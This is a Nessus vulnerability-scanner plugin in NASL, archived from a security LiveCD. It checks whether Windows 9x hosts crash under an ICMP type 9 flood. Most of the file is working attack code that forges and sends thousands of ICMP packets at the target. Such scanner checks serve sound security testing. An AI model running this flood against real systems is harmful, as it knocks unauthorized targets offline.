home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / p-smash.nasl

< prev

next >

Wrap

Text File  |  2005-03-31  |  3KB  |  106 lines

---

1. #
2. # This script was written by Michel Arboi <arboi@alussinan.org>
3. #
4. # Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com>
5. #      Erik Anderson <eanders@carmichaelsecurity.com>
6. #      Added link to the Microsoft Knowledgebase
7. #
8. # GPL
9. #
10. # According to "Paulo Ribeiro" <prrar@NITNET.COM.BR> on VULN-DEV,
11. # Windows 9x cannot handle ICMP type 9 messages.
12. # This should slow down Windows 95 and crash Windows 98
13. #
14.  
15. if(description)
16. {
17.  script_id(11024);
18.  script_version ("$Revision: 1.7 $");
19.  name["english"] = "p-smash DoS (ICMP 9 flood)";
20.  name["francais"] = "DΘni de service p-smash (inondation ICMP 9)";
21.  script_name(english:name["english"], francais:name["francais"]);
22.  
23.  desc["english"] = "It was possible to crash the remote 
24. machine by flooding it with ICMP type 9 packets.
25.  
26. A cracker may use this attack to make this
27. host crash continuously, preventing you
28. from working properly.
29.  
30.  
31. Solution : upgrade your Windows 9x operating system or change it.
32.  
33. Reference : http://support.microsoft.com/default.aspx?scid=KB;en-us;q216141
34.  
35. Risk factor : High";
36.  
37.  desc["francais"] = "Il a ΘtΘ possible de
38. faire planter la machine distante en l'inondant
39. de paquets ICMP type 9.
40.  
41. Un pirate peut utiliser ce problΦme pour tuer 
42. continuellement cette machine, vous empechant 
43. de travailler correctement.
44.  
45.  
46. Solution : mettez α jour votre systΦme d'exploitation 
47. Windows 9x ou changez le.
48.  
49. Facteur de risque : ElevΘ";
50.  
51.  script_description(english:desc["english"], francais:desc["francais"]);
52.  
53.  summary["english"] = "Flood the remote machine with ICMP 9";
54.  summary["francais"] = "Inonde la machine d'ICMP 9";
55.  script_summary(english:summary["english"], francais:summary["francais"]);
56.  
57.  script_category(ACT_KILL_HOST);
58.   
59.  script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
60.         francais:"Ce script est Copyright (C) 2002 Michel Arboi");
61.  family["english"] = "Denial of Service";
62.  family["francais"] = "DΘni de service";
63.  #family["english"] = "Untested";
64.  #family["francais"] = "Untested";
65.  
66.  script_family(english:family["english"], francais:family["francais"]);
67.            
68. # script_add_preference(name:"Flood length :",     type:"entry", value:"5000");    
69. # script_add_preference(name:"Data length :",     type:"entry", value:"500");    
70.  exit(0);
71. }
72.  
73. #
74. # The script code starts here
75. #
76.  
77. start_denial();
78.  
79. fl = script_get_preference("Flood length :");
80. if (! fl) fl = 5000;
81. dl = script_get_preference("Data length :");
82. if (! dl) dl = 500;
83.  
84. src = this_host();
85. dst = get_host_ip();
86. id = 804;
87. s = 0;
88. d = crap(dl);
89. for (i = 0; i < fl; i = i + 1)
90. {
91.  id = id + 1;
92.  ip = forge_ip_packet(ip_v:4, ip_hl:5, ip_tos:0, ip_off:0,ip_len:20,
93.                       ip_p:IPPROTO_ICMP, ip_id:id, ip_ttl:0x40,
94.               ip_src:this_host());
95.  icmp = forge_icmp_packet(ip:ip, icmp_type:9, icmp_code:0,
96.                icmp_seq: s, icmp_id:s, data:d);
97.  s = s + 1;
98.  send_packet(icmp, pcap_active: 0);
99. }
100.  
101. alive = end_denial();
102. if(!alive){
103.     security_hole();
104.     set_kb_item(name:"Host/dead", value:TRUE);
105. }
106.